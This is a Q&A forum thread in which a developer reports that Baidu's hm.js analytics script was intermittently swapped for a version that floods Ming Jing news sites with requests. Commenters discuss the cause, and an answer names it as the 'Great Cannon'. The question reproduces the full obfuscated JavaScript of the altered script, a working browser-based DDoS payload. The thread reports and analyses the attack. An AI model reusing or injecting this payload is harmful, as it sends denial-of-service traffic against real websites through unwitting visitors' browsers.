Login/Register
What is randomly replacing Baidu TongJi (Analytics)'s Javascript code to make DDOS attack on websites on browser?
Asked Answered
Solved javascriptsecuritywebddosbaidu
M

1

24

Update:

It seems that different hm.js (Baidu TongJi JS library) are loaded. When no DDOS attack is observed, a standard hm.js is loaded; when there is a DDOS, a totally different hm.js is loaded. I am suspecting the Great Firewall of China is altering the code.

This is the hm.js that has been modified to launch DDOS:

// the following code launches DDOS against sites like mingjingnews.com

eval(function(p, a, c, k, e, d) {
    e = function(c) {
        return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
    }
    ;
    if (!''.replace(/^/, String)) {
        while (c--)
            d[e(c)] = k[c] || e(c);
        k = [function(e) {
            return d[e]
        }
        ];
        e = function() {
            return '\\w+'
        }
        ;
        c = 1;
    }
    ;while (c--)
        if (k[c])
            p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c]);
    return p;
}('c((/15\\/([\\d]+)/16.17(l.A.D.E())[1]>=12)&&(l.A.D.E().14("18")<0)){3 G=1c;3 p=[\'i://1d.o.j/\',\'i://1e.o.j/\',\'i://19.o.j/\',\'i://1a.1b.j/\',\'i://S.o.j/U/Y/Z.11\'];3 J=V;3 n=W;3 N=10;3 v=1;g u(){3 a=e 7();H 7.X(a.T(),a.1w(),a.1x(),a.1v(),a.P(),a.L())/R}h.C("F")[0].I="<1t 1u=\\"B\\" 1y=\\"1C-B\\">"+h.C("F")[0].I;3 6=[];3 f=[];3 x=5;3 b=[];3 9=[];3 w=\'\';3 m=0;g q(2){3 8=6[2];c(8!=5){h.z.1B(8)}6[2]=5;c(m<J&&9[2]-x<G){O(\'s(\'+2+\')\',(9[2]-b[2])>n?n:(9[2]-b[2]))}}g Q(2){c(6[2]==5){H}c(6[2].1j){l.y(f[2]);9[2]=e 7().k();q(2)}1k{c(e 7().k()-b[2]>n){l.y(f[2]);q(2)}}}g s(2){8=h.z.1q(h.1r(\'1m\'));w=p[u()%p.1o];8.1n=w+\'?t=\'+u()+M.1p(M.1l()*1h);8.1g.1f=\'1i\';6[2]=8;b[2]=9[2]=e 7().k();f[2]=1s("Q("+2+")",1A);m=m+1}g K(){x=e 7().k();1z(3 4=0;4<N;4+=1){6[4]=5;f[4]=5;b[4]=5;9[4]=5;s(4)}}3 r=e 7();O(\'K()\',((v-r.P()%v)*13-r.L())*R)}', 62, 101, '||index|var|ti|null|p_img_list|Date|p_img_tmp|responsetime_list|dt|requesttime_list|if||new|timer_list|function|document|http|com|getTime|window|count|TIMEGAP|mingjingnews|url_list|imgdel|now|imgadd||unixtime|START_CLOCK|url|starttime|clearInterval|body|navigator|referrer|getElementsByTagName|userAgent|toLowerCase|head|MAX_TIME|return|innerHTML|MAX_COUNT|start|getSeconds|Math|THREAD|setTimeout|getMinutes|isImgComplete|1000|bravo1|getFullYear|2017|100000000|500|UTC|01|bravo||html|34|60|indexOf|chrome|gi|exec|edge|tv2|www|mingjingtimes|300000|news2|s3|display|style|100|none|complete|else|random|img|src|length|ceil|appendChild|createElement|setInterval|meta|name|getHours|getMonth|getDate|content|for|50|removeChild|no'.split('|'), 0, {}))

Compare this to the original hm.js code, where no DDOS is present.

Both of these 2 hm.js libraries are coming from the exact same address.

Developer Console in Chrome

I have a site that uses Baidu TongJi (Analytics). Like most other javascript libraries, it is done through injecting a line of Javascript to the HTML.

module.exports = function(id) {
if (!id) {
    throw new Error('请填写百度统计id');
}
    var elm = document.createElement('script');
    elm.src = '//hm.baidu.com/hm.js?' + id;
    var body = document.getElementsByTagName('body')[0];
    body.appendChild(elm);
}

To my horror, once it has initialised, my browser's console and network screen is flood with around 3000+ network requests to Ming Jing News (fake news according to Chinese's communist government) in just 100 seconds... and it kept going until I stopped it.

I am starting to think this is similar to the last time the great wall of china was used to launch attacks to GitHub using Baidu's CDN.

I am currently calling Baidu from outside of the China and I am wondering if this is normal... Will the people inside China be spared from this?

Maurits answered 25/8, 2017 at 4:42 Comment(14)
Can you clarify what exactly your programming question is?Winsome
@CodyGray less on programming, more about internet security and internet in China... and using Baidu services from outside of China?Maurits
Yeah, that was my concern (and some other users who flagged your question). Stack Overflow only deals with programming questions, so I'm not sure if this is a good fit for our site. It's obviously been an interesting question to a number of people, but I'm not sure where else it might be appropriate.Winsome
@CodyGray Beside programming questions, I think network / security questions are also allowed here in Stackoverflow. Right now on the right sidebar, Stackoverflow is showing me related questions about Baidu / Google analytics, DDOS as well as a full category of "Hot Network Questions".Maurits
@Maurits - the "related" questions are all programing related. The "hot network questions" are from other sites in the Stack Exchange network. Each of those sites covers different topics than Stack Overflow. For example, this is probably a better fit over on IT Security but it needs a clearer question first. While interesting, I don't really see an answerable question in this post. It's mostly just calling for speculation about who an unknown actor is and we'd just be guessing at that too.Myrica
Main problem I see with this question is to understand what is replacing the .js, could be a whole bunch of reasons and hacks (could be your site being compromised and not an external provider)... hard to know/ensure/cross-validate to know.Rayerayfield
@Rayerayfield it was not related to my site. I finally traced it down to the actual Baidu Analytics JS library that my site uses. From time to time, the code downloaded from their server will be completely different with instructions to launch DDOS attack on a number of sites. After a few refresh, the JS library code will become normal again. I managed to copied down 2 version of the hm.js served by the Baidu CDN. gist.github.com/williamli/223033fd95179d966fd2b4ce4543cfbbMaurits
@Maurits the code you're downloading is different, I can't tell if I can be sure you're really downloading from Baidu server or if your workstation is compromised in some way, where a botnet could override DNS information to make your browser get an attack lib instead (one in many way for the sake of exemple)Rayerayfield
@Rayerayfield what do you think I can do to see where the attack came from? I can try and find the actual IP the code was pulled from.Maurits
@AJHenderson let me try and update the question.Maurits
Is there a possibility of loading the js via https? Checking the SSL cert (and signing authority) for the provider of the information would allow tieing it directly to Baidu, but without that, it could be anyone along the way.Myrica
@AJHenderson good suggestion. let me force it to use https and seeMaurits
I can't repro, I assume the id is specific to your site and the lib doesn't download without a valid one (I get 0 length responses only trying to download it)Rayerayfield
@AJHenderson Right now everything seems fine. They only replace my hm.js (baidu) code from time to time and it seems they are not in attack mode right now. I will post back here once my code is beginning swapped again and then I will try to get SSL / IP info and will try enforcing a https connection.Maurits
M
10

As suggested by a now deleted answer by kos, this is is a (relatively) new form of attack employed by China. It was made famous by an attack on GitHub back in 2015. This form of attack is now known as "Great Cannon".

Details are available on Brian Krebs's security blog.

The Great Cannon

Maurits answered 25/8, 2017 at 15:3 Comment(0)

© 2022 - 2024 — McMap. All rights reserved.